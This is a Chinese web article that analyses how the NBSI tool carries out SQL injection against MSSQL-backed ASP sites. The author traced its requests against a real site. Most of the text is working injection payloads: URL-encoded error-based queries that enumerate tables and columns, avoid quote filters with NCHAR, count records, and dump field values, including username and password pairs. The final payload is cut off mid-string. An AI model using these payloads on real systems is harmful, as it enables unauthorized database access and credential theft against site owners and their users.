NBSI 注入分析跟踪报告(MSSQL篇)(图)
作者:佚名 文章来源:不详 点击数: 更新时间:2007-4-20 22:01:29
前言:
编写一个好的工具不容易,编写一个注入工具更是不容易。这篇文章系统通过跟踪NBSI的注入过程来分析牛人的测试思路。对手工分析刺探很有帮助。仔细跟踪NBSI的刺探结果也是对注入攻击的一种欣赏。
首先我们找到了一家IT站点做测试,测试的目录仅仅是为了跟踪NBSI的刺探思路,不曾对该网站进行过恶意的破坏!
1 注入点的探测
假设注入点为:http://www.xxx.com/zhuru.asp?id=1
那么NBSI会首先试探这样的连接:http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(124)>0
最开始不明白为什么要叫个Char(124),这个值其实是个”|”符号。后面我们会说到。
当然了,这样IIS会报错,返回一个500的内部错误号码,也许作者就以此为根据吧。
3 猜解表名
跟踪发现,作者用一句话就完成一个表名的猜解,效率的确很高。具体的表名猜测代码为:
And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0
看见红色的1了吗?这个就是猜测数据表的表名数值!如果是第一个表,当然就为1,如果是第一个表那么这个1就改为2就是了,以此类推。
那么我们如何决定表名已经猜测完毕了呢?这个简单,跟踪发现,只要 表名数值 X 和 X+1 个表返回的表名值是一样的表示猜测完毕了。
5 猜测列名
跟踪发现,作者也是用一句话就完成了一个表名的猜解。可能这个就是对MSSQL猜解的好处吧!换了Access可能也是要一个字母一个字母的去猜。具体的猜解列名的代码为:
And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)>0
看到红色的1了吗?这个表示我们要猜测列名的序列值。换成2就表示要猜测第2个列名。判断结束的方式和判断表名结束的方式一样。
注意一点:
NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)
为了饶过 ‘ 符号的限制,作者尽量使用Nchar来连接表名的字符串值。上面这一传实际上就代表了一个表的字符串值。括号里面的数字是字符的ASC码。
举例:
如果我们要猜测xfiletd这个表名,我们只要用HUIE的插件换算一下就OK了!
见下图:
我们就得到了下面字符:
nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)
呵呵!速度快吧!
6猜解数据
下面我们来看看NBSI是如何猜解数据的,按道理应该是“暴”,让我们期待一下牛人是如何暴数据的。
1) 得到字段的记录个数
And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20Where%201=1)>0
其中红色的News_Style代表我们要猜解的表名,这里作者用到了一个常用的暴表技巧。我们得到了字段数以后,字段是个INT类型的值,他和0比较是不会发生类型转换错误的。换句话说,记录就不会自动的“招”。如果我们在和0比较的时候实现就把把它和Char(97)//字符a 相连接,那么我们得到的就会是个字符串了。和零比较的时候自然就暴出了“记录个数”+a这样一个数值来。现在大家该明白为什么第一步的刺探要加一个”|”符号了吧!谜底解开了。
2) 得到字段的值
得到了记录个数,然后不断的循环而暴出字段的值。还好,作者没用什么奇特的招数。作者的代码为:
And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)>0
红色的news_style我不多解释了,就是要猜解的数据表名,绿色的9表示要得到第就 sname字段的第9条记录的值。循环几次,呵呵!数据就到手了。
大家注意一下:char(124)这个东西。它的目的也在于把数据统统转化为字符串类型然后和int类型进行比较,然后暴出数据。道理如前所述!这就是NBSI为什么在得到的字段里面有”|”这样的值的原因。作者也许懒得处理罢了。:-)
看到了吗?后面都有”|”符号。
3)关于双数据和N个数据的猜测
大家也许觉得,NBSI猜测数据字段的值的速度很快,跟踪分析了一下,的确不错。假设我们要猜测一个表的2个字段的值。那么我们该如何写代码呢?
NBSI的代码是这样写的:
第一步还是用1)的办法得到记录个数。第二步就用:
And (Select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (Select Top 1 UserName,PassWord From [News_Us
相关专题:
 网友评论:(评论内容只代表网友观点,与本站立场无关!) |
- GOOGLE广告
阅读排行
|
